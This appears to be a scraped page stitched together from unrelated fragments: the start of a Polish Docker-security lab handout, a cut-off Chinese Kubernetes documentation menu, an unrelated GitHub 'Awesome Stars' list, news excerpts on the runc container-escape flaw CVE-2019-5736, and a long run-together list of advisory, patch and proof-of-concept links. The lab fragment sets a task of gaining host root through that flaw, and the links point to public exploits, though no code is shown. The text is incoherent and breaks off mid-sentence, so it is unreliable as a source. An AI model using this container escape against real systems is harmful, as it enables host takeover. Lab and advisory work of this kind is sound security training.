DOCKER SECURITY - LABORATORIA PREZENTACJA Przed rozpoczęciem Przed rozpoczęciem pracy z laboratoriami należy pobrać oraz uruchomić maszynę wirtualną: maszyna Maszynę należy uruchomić w programie VMware Zadanie 1 Odzyskaj z warstw obrazu flagę Link do obrazu Zadanie 2 Uzyskaj dostęp na konto root za pomocą podatności CVE 2019-5736 Wszystkie pliki potrzebne do w

概览 产品简介 产品概念 使用须知 产品价格 名词解释 使用必读 入门必读 集群版本 维护说明 版本跟踪 126 版本说明 集群管理 创建集群 查看集群 删除集群 通过 Kubectl 管理集群 kubectl 命令行简介 安装及配置 kubectl 使用 web kubectl 集群更新凭证 创建 PVC 创建 Service StatefulSet 示例 ku

A curated list of starred project sorted by languages

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASP Assembly Batchfile C C# C++ CMake CSS Cirru Clojure CoffeeScript Common Lisp Cuda D Dart Dockerfile Elixir Emacs Lisp Erlang F# Gherkin Gnuplot Go Groovy HCL HTML Haskell Inno Setup Java JavaScript Jsonnet Julia Jupyter Notebook Kotlin LLVM Lua Makefile Mathematica Nim OCaml Objective-C Othe

Recent Articles

Patch this run(DM)c Docker flaw or you be illin'... Tricky containers can root host boxes. It's like that – and that's the way it is
The Register • Thomas Claburn in San Francisco • 11 Feb 2019

'Doomsday scenario' unless devops crowd walks this way Docker invites elderly Windows Server apps to spend remaining days in supervised care

Aleksa Sarai, a senior software engineer at SUSE Linux GmbH, has disclosed a serious vulnerability affecting runc, the default container runtime for Docker, containerd, Podman, and CRI-O. "While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies...and that’s exactly what this vulnerability represents," said Scott McCarty, principal product manager for contain...

References

CWE-78https://www.openwall.com/lists/oss-security/2019/02/11/2https://github.com/opencontainers/runc/commit/6635b4f0c6af3810594d2770f662f34ddc15b40dhttps://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558bhttps://github.com/docker/docker-ce/releases/tag/v18.09.2https://access.redhat.com/security/vulnerabilities/runcescapehttps://access.redhat.com/security/cve/cve-2019-5736https://www.twistlock.com/2019/02/11/how-to-mitigate-cve-2019-5736-in-runc-and-docker/https://github.com/rancher/runc-cvehttps://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runchttps://brauner.github.io/2019/02/12/privileged-containers.htmlhttps://aws.amazon.com/security/security-bulletins/AWS-2019-002/https://access.redhat.com/errata/RHSA-2019:0304https://access.redhat.com/errata/RHSA-2019:0303https://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/https://www.exploit-db.com/exploits/46359/http://www.securityfocus.com/bid/106976https://www.exploit-db.com/exploits/46369/https://github.com/q3k/cve-2019-5736-pochttps://github.com/Frichetten/CVE-2019-5736-PoChttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runchttps://www.synology.com/security/advisory/Synology_SA_19_06https://access.redhat.com/errata/RHSA-2019:0401https://access.redhat.com/errata/RHSA-2019:0408https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03913en_ushttps://security.netapp.com/advisory/ntap-20190307-0008/http://www.openwall.com/lists/oss-security/2019/03/23/1https://bugzilla.suse.com/show_bug.cgi?id=1121967https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.htmlhttps://support.mesosphere.com/s/article/Known-Issue-Container-Runtime-Vulnerability-MSPH-2019-0003http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00044.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-04/msg00074.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-04/msg00091.htmlhttps://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03410944https://access.redhat.com/errata/RHSA-2019:0975https://azure.microsoft.com/en-us/updates/iot-edge-fix-cve-2019-5736/https://azure.microsoft.com/en-us/updates/cve-2019-5736-and-runc-vulnerability/http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00060.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-05/msg00073.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00011.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00015.htmlhttp://www.openwall.com/lists/oss-security/2019/06/28/2http://www.openwall.com/lists/oss-security/2019/07/06/4http://www.openwall.com/lists/oss-security/2019/07/06/3https://usn.ubuntu.com/4048-1/http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-10/msg00007.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-10/msg00029.htmlhttp://www.openwall.com/lists/oss-security/2019/10/24/1http://www.openwall.com/lists/oss-security/2019/10/29/3https://security.gentoo.org/glsa/202003-21http://packetstormsecurity.com/files/163339/Docker-Container-Escape.htmlhttp://packetstormsecurity.com/files/165197/Docker-runc-Command-Execution-Proof-Of-Concept.htmlhttps://lists.apache.org/thread.html/b162dd624dc088cd634292f0402282a1d1d0ce853baeae8205bc033c%40%3Cdev.mesos.apache.org%3Ehttps://lists.apache.org/thread.html/a258757af84c5074dc7bf932622020fd4f60cef65a84290380386706%40%3Cuser.mesos.apache.org%3Ehttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V6A4OSFM5GGOWW4ECELV5OHX2XRAUSPH/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SWFJGIPYAAAMVSWWI3QWYXGA3ZBU2H4W/https://lists.apache.org/thread.html/acacf018c12636e41667e94ac0a1e9244e887eef2debdd474640aa6e%40%3Cdev.dlab.apache.org%3Ehttps://lists.apache.org/thread.html/a585f64d14c31ab393b90c5f17e41d9765a1a17eec63856ce750af46%40%3Cdev.dlab.apache.org%3Ehttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EGZKRCKI3Y7FMADO2MENMT4TU24QGHFR/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DLC52IOJN6IQJWJ6CUI6AIUP6GVVG2QP/https://lists.apache.org/thread.html/24e54e3c6b2259e3903b6b8fe26896ac649c481ea99c5739468c92a3%40%3Cdev.dlab.apache.org%3Ehttps://lists.apache.org/thread.html/rc494623986d76593873ce5a40dd69cb3629400d10750d5d7e96b8587%40%3Cdev.dlab.apache.org%3Ehttps://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3Ehttp://www.openwall.com/lists/oss-security/2024/01/31/6http://www.openwall.com/lists/oss-security/2024/02/01/1http://www.openwall.com/lists/oss-security/2024/02/02/3https://usn.ubuntu.com/4048-1/https://nvd.nist.govhttps://www.exploit-db.com/exploits/46359https://seclists.org/oss-sec/2019/q1/119